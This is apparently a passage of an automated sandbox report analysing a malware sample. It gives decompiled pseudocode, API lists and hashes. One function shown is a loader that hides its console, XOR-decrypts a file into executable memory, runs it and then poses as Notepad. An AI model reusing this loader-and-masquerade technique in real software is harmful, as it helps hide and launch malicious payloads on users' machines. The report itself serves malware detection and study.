                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: FileFindFirst_free
                                          • String ID:
                                          • API String ID: 689657435-0
                                          • Opcode ID: a9516da29ce77edf512b34eca062a355a21c3e56de08c63518bd5033ebcb3a42
                                          • Instruction ID: ac738ddc05043a7de4f7f547b6bbfe29bf306f2da5dee0d74ac5a1891a670a98
                                          • Opcode Fuzzy Hash: a9516da29ce77edf512b34eca062a355a21c3e56de08c63518bd5033ebcb3a42
                                          • Instruction Fuzzy Hash: 3361C671D141199FDF299F28CC88AFEBBB9AF05204F5441D9E069A7290EB304E848F51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01197CD3 Relevance: 6.2, APIs: 4, Instructions: 199fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E01197CD3(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				void* __ebx;
				void* __edi;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				union _FINDEX_INFO_LEVELS _t100;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				void* _t126;
				union _FINDEX_INFO_LEVELS _t127;
				void* _t128;
				intOrPtr _t130;
				intOrPtr* _t133;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t143;
				signed int _t149;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_push(__ecx);
				_t133 = _a4;
				_t155 = _t133 + 1;
				do {
					_t68 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t135 = _t133 - _t155 + 1;
				_v8 = _t135;
				if(_t135 <=  !_t158) {
					_push(__esi);
					_t126 = _t158 + 1 + _t135;
					_t165 = E011971A3(_t126, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t126 = _t126 - _t158;
						_t73 = E0119BAB9(_t165 + _t158, _t126, _a4);
						_t172 = _t171 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t130 = _a16;
							_t118 = E01197C4C(_t130);
							_v8 = _t118;
							__eflags = _t118;
							if(_t118 == 0) {
								 *( *(_t130 + 4)) = _t165;
								_t167 = 0;
								_t14 = _t130 + 4;
								 *_t14 =  *(_t130 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E011963FE(_t165);
								_t167 = _v8;
							}
							E011963FE(0);
							_t121 = _t167;
							goto L4;
						}
					} else {
						_push(_t158);
						_t123 = E0119BAB9(_t165, _t126, _a8);
						_t172 = _t171 + 0x10;
						__eflags = _t123;
						if(_t123 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E011964E1();
							asm("int3");
							_t170 = _t172;
							_t173 = _t172 - 0x298;
							_t75 =  *0x11a7210; // 0xbb40e64e
							_v48 = _t75 ^ _t170;
							_t138 = _v32;
							_t156 = _v28;
							_push(_t126);
							_push(0);
							_t160 = _v36;
							_v648 = _t156;
							__eflags = _t138 - _t160;
							if(_t138 != _t160) {
								while(1) {
									_t116 =  *_t138;
									__eflags = _t116 - 0x2f;
									if(_t116 == 0x2f) {
										break;
									}
									__eflags = _t116 - 0x5c;
									if(_t116 != 0x5c) {
										__eflags = _t116 - 0x3a;
										if(_t116 != 0x3a) {
											_t138 = E0119BBC0(_t160, _t138);
											__eflags = _t138 - _t160;
											if(_t138 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t156 = _v612;
							}
							_t77 =  *_t138;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t127 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t127;
								_v668 = _t127;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t127;
								_v660 = _t127;
								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
								_v656 = _t127;
								_v652 = _t127;
								_t84 = E01197883(_t138 - _t160 + 1, _t160,  &_v672, E011977EB(_t156, __eflags));
								_t174 = _t173 + 0xc;
								asm("sbb eax, eax");
								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
								__eflags = _t166 - 0xffffffff;
								if(_t166 != 0xffffffff) {
									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t143;
									_t144 = _t143 >> 2;
									_v644 = _t143 >> 2;
									do {
										_v636 = _t127;
										_v632 = _t127;
										_v628 = _t127;
										_v624 = _t127;
										_v620 = _t127;
										_v616 = _t127;
										_t94 = E01197B7D( &(_v604.cFileName),  &_v636,  &_v605, E011977EB(_t156, __eflags));
										_t174 = _t174 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E01197CD3(_t144, _t166, _t97, _t160, _v640);
											_t174 = _t174 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t127;
												if(_v616 != _t127) {
													E011963FE(_v628);
													_t98 = _v648;
												}
												_t127 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t144 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t144;
											if(_t144 == 0) {
												goto L35;
											} else {
												__eflags = _t144 - 0x2e;
												if(_t144 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t166);
										goto L44;
										L35:
										__eflags = _v616 - _t127;
										if(_v616 != _t127) {
											E011963FE(_v628);
											_pop(_t144);
										}
										__eflags = FindNextFileW(_t166,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t149 = _v644;
									_t156 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t149 - _t109;
									if(_t149 != _t109) {
										E0119B630(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E01197FDB);
									}
									goto L43;
								} else {
									_push(_v612);
									_t127 = E01197CD3( &_v604, _t166, _t160, _t127, _t127);
								}
								L44:
								__eflags = _v652;
								_pop(_t165);
								if(_v652 != 0) {
									E011963FE(_v664);
								}
								_t100 = _t127;
							} else {
								__eflags = _t138 - _t160 + 1;
								if(_t138 == _t160 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t156);
									_t100 = E01197CD3(_t138, _t165, _t160, 0, 0);
								}
							}
							_pop(_t161);
							__eflags = _v12 ^ _t170;
							_pop(_t128);
							return E01191F25(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
						} else {
							goto L7;
						}
					}
				} else {
					_t121 = 0xc;
					L4:
					return _t121;
				}
			}


































































                                          0x01197cd8
                                          0x01197cd9
                                          0x01197cdc
                                          0x01197cdf
                                          0x01197cdf
                                          0x01197ce1
                                          0x01197ce2
                                          0x01197ce7
                                          0x01197cee
                                          0x01197cf1
                                          0x01197cf6
                                          0x01197cff
                                          0x01197d03
                                          0x01197d0d
                                          0x01197d11
                                          0x01197d13
                                          0x01197d27
                                          0x01197d27
                                          0x01197d2a
                                          0x01197d34
                                          0x01197d39
                                          0x01197d3c
                                          0x01197d3e
                                          0x00000000
                                          0x01197d40
                                          0x01197d40
                                          0x01197d45
                                          0x01197d4c
                                          0x01197d4f
                                          0x01197d51
                                          0x01197d62
                                          0x01197d64
                                          0x01197d66
                                          0x01197d66
                                          0x01197d66
                                          0x01197d53
                                          0x01197d54
                                          0x01197d59
                                          0x01197d5c
                                          0x01197d6b
                                          0x01197d71
                                          0x00000000
                                          0x01197d74
                                          0x01197d15
                                          0x01197d15
                                          0x01197d1b
                                          0x01197d20
                                          0x01197d23
                                          0x01197d25
                                          0x01197d77
                                          0x01197d79
                                          0x01197d7a
                                          0x01197d7b
                                          0x01197d7c
                                          0x01197d7d
                                          0x01197d7e
                                          0x01197d83
                                          0x01197d87
                                          0x01197d89
                                          0x01197d8f
                                          0x01197d96
                                          0x01197d99
                                          0x01197d9c
                                          0x01197d9f
                                          0x01197da0
                                          0x01197da1
                                          0x01197da4
                                          0x01197daa
                                          0x01197dac
                                          0x01197dae
                                          0x01197dae
                                          0x01197db0
                                          0x01197db2
                                          0x00000000
                                          0x00000000
                                          0x01197db4
                                          0x01197db6
                                          0x01197db8
                                          0x01197dba
                                          0x01197dc5
                                          0x01197dc7
                                          0x01197dc9
                                          0x00000000
                                          0x00000000
                                          0x01197dc9
                                          0x01197dba
                                          0x00000000
                                          0x01197db6
                                          0x01197dcb
                                          0x01197dcb
                                          0x01197dd1
                                          0x01197dd3
                                          0x01197dd9
                                          0x01197ddb
                                          0x01197dfd
                                          0x01197dfd
                                          0x01197dff
                                          0x01197e01
                                          0x01197e0d
                                          0x01197e0d
                                          0x01197e03
                                          0x01197e03
                                          0x01197e05
                                          0x00000000
                                          0x01197e07
                                          0x01197e07
                                          0x01197e09
                                          0x01197e0b
                                          0x00000000
                                          0x00000000
                                          0x01197e0b
                                          0x01197e05
                                          0x01197e15
                                          0x01197e1d
                                          0x01197e23
                                          0x01197e24
                                          0x01197e26
                                          0x01197e2e
                                          0x01197e34
                                          0x01197e3a
                                          0x01197e40
                                          0x01197e54
                                          0x01197e59
                                          0x01197e64
                                          0x01197e7a
                                          0x01197e7c
                                          0x01197e7f
                                          0x01197ea2
                                          0x01197ea2
                                          0x01197ea4
                                          0x01197ea7
                                          0x01197ead
                                          0x01197ead
                                          0x01197eb3
                                          0x01197eb9
                                          0x01197ebf
                                          0x01197ec5
                                          0x01197ecb
                                          0x01197eec
                                          0x01197ef1
                                          0x01197ef6
                                          0x01197efa
                                          0x01197f00
                                          0x01197f03
                                          0x01197f16
                                          0x01197f16
                                          0x01197f24
                                          0x01197f29
                                          0x01197f2c
                                          0x01197f32
                                          0x01197f34
                                          0x01197f92
                                          0x01197f98
                                          0x01197fa0
                                          0x01197fa5
                                          0x01197fab
                                          0x01197fac
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197f05
                                          0x01197f05
                                          0x01197f08
                                          0x01197f0a
                                          0x00000000
                                          0x01197f0c
                                          0x01197f0c
                                          0x01197f0f
                                          0x00000000
                                          0x01197f11
                                          0x01197f11
                                          0x01197f14
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197f14
                                          0x01197f0f
                                          0x01197f0a
                                          0x01197fae
                                          0x01197faf
                                          0x00000000
                                          0x01197f36
                                          0x01197f36
                                          0x01197f3c
                                          0x01197f44
                                          0x01197f49
                                          0x01197f49
                                          0x01197f58
                                          0x01197f58
                                          0x01197f60
                                          0x01197f66
                                          0x01197f6c
                                          0x01197f73
                                          0x01197f76
                                          0x01197f78
                                          0x01197f88
                                          0x01197f8d
                                          0x00000000
                                          0x01197e81
                                          0x01197e81
                                          0x01197e92
                                          0x01197e92
                                          0x01197fb5
                                          0x01197fb5
                                          0x01197fbc
                                          0x01197fbd
                                          0x01197fc5
                                          0x01197fca
                                          0x01197fcb
                                          0x01197ddd
                                          0x01197de0
                                          0x01197de2
                                          0x01197df7
                                          0x00000000
                                          0x01197de4
                                          0x01197de4
                                          0x01197dea
                                          0x01197def
                                          0x01197de2
                                          0x01197fd0
                                          0x01197fd1
                                          0x01197fd3
                                          0x01197fda
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197d25
                                          0x01197cf8
                                          0x01197cfa
                                          0x01197cfb
                                          0x01197cfd
                                          0x01197cfd

                                          APIs
                                            • Part of subcall function 011971A3: HeapAlloc.KERNEL32(00000008,?,00000000,?,01195671,00000001,00000364,FFFFFFFF,000000FF,?,01198694,?,00000004,00000000,?,?), ref: 011971E4
                                          • _free.LIBCMT ref: 01197D54
                                          • _free.LIBCMT ref: 01197D6B
                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01197E74
                                          • _free.LIBCMT ref: 01197F44
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 01197F52
                                          • _free.LIBCMT ref: 01197FA0
                                          • FindClose.KERNEL32(00000000), ref: 01197FAF
                                          • _free.LIBCMT ref: 01197FC5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$Find$File$AllocCloseFirstHeapNext
                                          • String ID:
                                          • API String ID: 2272182792-0
                                          • Opcode ID: d6d7f2d5212a9e842d7720038e7ea5576e7602bb9fe527d45b1bcf56a045b341
                                          • Instruction ID: c2c0df3e13878fd59c9e14126ca417a87d0c8c73a594b3e340242717521292fd
                                          • Opcode Fuzzy Hash: d6d7f2d5212a9e842d7720038e7ea5576e7602bb9fe527d45b1bcf56a045b341
                                          • Instruction Fuzzy Hash: 15513C729141196FEF2D9F6C9C84AFEBBF9DF85218F144199E47997280EB308D418F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01191B31 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E01191B31(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E01191AD6(_t34);
				 *_t60 = 0x2cc;
				_v632 = E011928D0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E011928D0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E01191AD6(_t49);
				}
				return _t49;
			}


































                                          0x01191b31
                                          0x01191b31
                                          0x01191b31
                                          0x01191b45
                                          0x01191b47
                                          0x01191b4a
                                          0x01191b4a
                                          0x01191b4e
                                          0x01191b53
                                          0x01191b6b
                                          0x01191b71
                                          0x01191b77
                                          0x01191b7d
                                          0x01191b83
                                          0x01191b89
                                          0x01191b8f
                                          0x01191b96
                                          0x01191b9d
                                          0x01191ba4
                                          0x01191bab
                                          0x01191bb2
                                          0x01191bb9
                                          0x01191bba
                                          0x01191bc3
                                          0x01191bc9
                                          0x01191bcc
                                          0x01191bd2
                                          0x01191be1
                                          0x01191bed
                                          0x01191bf8
                                          0x01191bff
                                          0x01191c06
                                          0x01191c11
                                          0x01191c19
                                          0x01191c22
                                          0x01191c24
                                          0x01191c27
                                          0x01191c29
                                          0x01191c33
                                          0x01191c3b
                                          0x01191c41
                                          0x00000000
                                          0x01191c48
                                          0x01191c4b

                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 01191B3D
                                          • IsDebuggerPresent.KERNEL32 ref: 01191C09
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01191C29
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 01191C33
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID:
                                          • API String ID: 254469556-0
                                          • Opcode ID: b12007bfa2dd2201cadcd800c1a5d3c7ea11c1522bb35698c506037681da095b
                                          • Instruction ID: 070282b953b8cc633145ebb5ad88b63defc47702d59f79f8fc66df80b7541f88
                                          • Opcode Fuzzy Hash: b12007bfa2dd2201cadcd800c1a5d3c7ea11c1522bb35698c506037681da095b
                                          • Instruction Fuzzy Hash: 4F312775D45219EBDF20DFA4D9897CCBBB8AF08304F5040AAE41DAB240EB715A848F44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011912E6 Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 173windowregistrymemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E011912E6(struct HWND__* __eax, void* __edx, void* __eflags, intOrPtr _a8) {
				char _v64;
				char _v104;
				intOrPtr _v132;
				char _v140;
				struct HACCEL__* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t39;
				struct HINSTANCE__* _t40;
				int _t42;
				struct HMONITOR__* _t46;
				void* _t66;
				intOrPtr* _t67;
				MSG* _t69;
				struct tagMONITORINFO* _t70;
				void* _t72;
				long _t77;
				WNDCLASSEXW* _t78;
				signed int _t80;
				void* _t86;
				void* _t91;
				void* _t92;
				void* _t93;

				_t93 = __eflags;
				_t72 = __edx;
				__imp__GetConsoleWindow();
				_t80 = 0;
				ShowWindow(__eax, 0);
				E011940E9(_t72, E01193CFA( *((intOrPtr*)(_a8 + 4)), 0x11a2a58), 0, 2);
				_t77 = E011943C0(_t66, _t72, _a8, 0, _t93, _t30);
				E011940E9(_t72, _t30, 0, 0);
				_t67 = VirtualAlloc(0, _t77, 0x3000, 0x40);
				E01193EE6(_t34, _t77, 1, _t30);
				_t91 = _t86 + 0x34;
				if(_t77 == 0) {
					L3:
					 *_t67();
					__imp__#17();
					RegisterWindowMessageW(L"commdlg_FindReplace");
					E011928D0(_t77, 0x11a7ab0, 0, 0x11f4);
					_t92 = _t91 + 0xc;
					_t39 = 0;
					do {
						 *((char*)(_t92 + _t39 + 0x20)) = 0;
						_t39 = _t39 + 1;
					} while (_t39 != 0x30);
					_t78 =  &_v104;
					_t78->cbSize = 0x30;
					 *((intOrPtr*)(_t78 + 8)) = E01191516;
					_t40 =  *0x11a7ab0; // 0x0
					_t78->hInstance = _t40;
					_t78->hIcon = LoadIconW(_t40, 0x300);
					_t42 = GetSystemMetrics(0x32);
					_t78->hIconSm = LoadImageW( *0x11a7ab0, 0x300, 1, GetSystemMetrics(0x31), _t42, 0x8000);
					_t78->hCursor = LoadCursorW(0, 0x7f00);
					_t78->hbrBackground = 6;
					_t78->lpszMenuName = 0x201;
					_t78->lpszClassName = L"Notepad";
					_t46 = RegisterClassExW(_t78);
					if(_t46 == 0) {
						__eflags = 0;
						return 0;
					}
					__imp__MonitorFromRect(0x11a8ca4, 1);
					_t70 =  &_v64;
					_t70->cbSize = 0x28;
					GetMonitorInfoW(_t46, _t70);
					_t99 =  *0x11a7ab4;
					if( *0x11a7ab4 == 0) {
						ExitProcess(1);
					}
					E0119109A(_t99);
					ShowWindow( *0x11a7ab4, 0);
					UpdateWindow( *0x11a7ab4);
					DragAcceptFiles( *0x11a7ab4, 1);
					GetCommandLineW();
					_v144 = LoadAcceleratorsW(0, 0x203);
					_t69 =  &_v140;
					if(GetMessageW(_t69, 0, 0, 0) == 0) {
						L13:
						return _v132;
					}
					do {
						if(IsDialogMessageW( *0x11a7ab8, _t69) == 0 && TranslateAcceleratorW( *0x11a7ab4, _v144, _t69) == 0) {
							TranslateMessage(_t69);
							DispatchMessageW(_t69);
						}
					} while (GetMessageW(_t69, 0, 0, 0) != 0);
					goto L13;
				}
				do {
					_t10 = "248058040134" +  ~((_t80 * 0xaaaaaaab >> 0x00000020 >> 0x00000001 & 0xfffffffc) + (_t80 * 0xaaaaaaab >> 0x00000020 >> 0x00000001 & 0xfffffffc) * 2); // 0x30383432
					 *(_t67 + _t80) =  *(_t67 + _t80) ^  *(_t80 + _t10);
					_t80 = _t80 + 1;
				} while (_t77 != _t80);
				goto L3;
			}



























                                          0x011912e6
                                          0x011912e6
                                          0x011912f4
                                          0x011912fa
                                          0x011912fe
                                          0x0119131a
                                          0x0119132b
                                          0x01191330
                                          0x01191347
                                          0x0119134e
                                          0x01191353
                                          0x01191358
                                          0x0119137c
                                          0x0119137c
                                          0x0119137e
                                          0x01191389
                                          0x0119139b
                                          0x011913a0
                                          0x011913a3
                                          0x011913a5
                                          0x011913a5
                                          0x011913aa
                                          0x011913ab
                                          0x011913b0
                                          0x011913b4
                                          0x011913ba
                                          0x011913c1
                                          0x011913c6
                                          0x011913d6
                                          0x011913e1
                                          0x011913ff
                                          0x0119140f
                                          0x01191412
                                          0x01191419
                                          0x01191420
                                          0x01191428
                                          0x01191431
                                          0x01191504
                                          0x00000000
                                          0x01191504
                                          0x0119143e
                                          0x01191444
                                          0x01191448
                                          0x01191450
                                          0x01191456
                                          0x0119145d
                                          0x01191510
                                          0x01191510
                                          0x01191463
                                          0x01191471
                                          0x0119147d
                                          0x0119148b
                                          0x01191491
                                          0x011914a3
                                          0x011914a6
                                          0x011914b6
                                          0x011914fe
                                          0x00000000
                                          0x011914fe
                                          0x011914c4
                                          0x011914cf
                                          0x011914e7
                                          0x011914ee
                                          0x011914ee
                                          0x011914fa
                                          0x00000000
                                          0x011914c4
                                          0x0119135f
                                          0x0119136d
                                          0x01191374
                                          0x01191377
                                          0x01191378
                                          0x00000000

                                          APIs
                                          • GetConsoleWindow.KERNEL32 ref: 011912F4
                                          • ShowWindow.USER32(00000000,00000000), ref: 011912FE
                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 01191341
                                          • __fread_nolock.LIBCMT ref: 0119134E
                                          • #17.COMCTL32 ref: 0119137E
                                          • RegisterWindowMessageW.USER32(commdlg_FindReplace), ref: 01191389
                                          • LoadIconW.USER32(00000000,00000300), ref: 011913D0
                                          • GetSystemMetrics.USER32 ref: 011913E1
                                          • GetSystemMetrics.USER32 ref: 011913E7
                                          • LoadImageW.USER32 ref: 011913F9
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 01191409
                                          • RegisterClassExW.USER32 ref: 01191428
                                          • MonitorFromRect.USER32(011A8CA4,00000001), ref: 0119143E
                                          • GetMonitorInfoW.USER32 ref: 01191450
                                          • ShowWindow.USER32(00000000), ref: 01191471
                                          • UpdateWindow.USER32 ref: 0119147D
                                          • DragAcceptFiles.SHELL32(00000001), ref: 0119148B
                                          • GetCommandLineW.KERNEL32 ref: 01191491
                                          • LoadAcceleratorsW.USER32 ref: 0119149D
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 011914AE
                                          • IsDialogMessageW.USER32(?), ref: 011914CB
                                          • TranslateAcceleratorW.USER32(?,?), ref: 011914DC
                                          • TranslateMessage.USER32(?), ref: 011914E7
                                          • DispatchMessageW.USER32 ref: 011914EE
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 011914F8
                                          • ExitProcess.KERNEL32 ref: 01191510
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: Message$Window$Load$MetricsMonitorRegisterShowSystemTranslate$AcceleratorAcceleratorsAcceptAllocClassCommandConsoleCursorDialogDispatchDragExitFilesFromIconImageInfoLineProcessRectUpdateVirtual__fread_nolock
                                          • String ID: Notepad$commdlg_FindReplace
                                          • API String ID: 3399944458-3095036754
                                          • Opcode ID: 4109246b0c96632918cd0ea68cea2489fc1a33b18b73e2f991d64b77158425c6
                                          • Instruction ID: 3178a8f6eb6eb8e6f35acb978b2f84843f51c676a349b2135aaa904a8deb3e7f
                                          • Opcode Fuzzy Hash: 4109246b0c96632918cd0ea68cea2489fc1a33b18b73e2f991d64b77158425c6
                                          • Instruction Fuzzy Hash: 9651F171104202BFE7795BB1DC0DF6B3FAEFB84719F840425F52596186D7719980CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01197525 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01197525(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x11a7908) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E011963FE(_t46);
							E01196EFC( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E011963FE(_t47);
							E01196FFA( *((intOrPtr*)(_t74 + 0x88)));
						}
						E011963FE( *((intOrPtr*)(_t74 + 0x7c)));
						E011963FE( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E011963FE( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E011963FE( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E011963FE( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
